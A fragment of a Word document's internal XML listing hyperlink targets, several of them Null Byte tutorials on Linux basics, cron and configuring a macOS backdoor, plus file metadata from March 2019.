Target="https://null-byte.wonderhowto.com/how-to/hack-like-pro-linux-basics-for-aspiring-hacker-part-7-managing-permissions-014779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admin.net/crontab-in-linux-with-20-examples-of-cron-schedul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ull-byte.wonderhowto.com/how-to/white-hats-guide-choosing-virtual-private-server-0183135/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/white-hats-guide-choosing-virtual-private-server-0183135/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/hacking-macos-configure-backdoor-anyones-macbook-0184637/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Named_pipe" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/hacking-macos-configure-backdoor-anyones-macbook-0184637/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null-byte.wonderhowto.com/how-to/hacking-macos-configure-backdoor-anyones-macbook-0184637" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://null-byte.wonderhowto.com/how-to/hacking-macos-configure-backdoor-anyones-macbook-01846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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Gopala Krishna</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-14T11:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-03-22T21:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>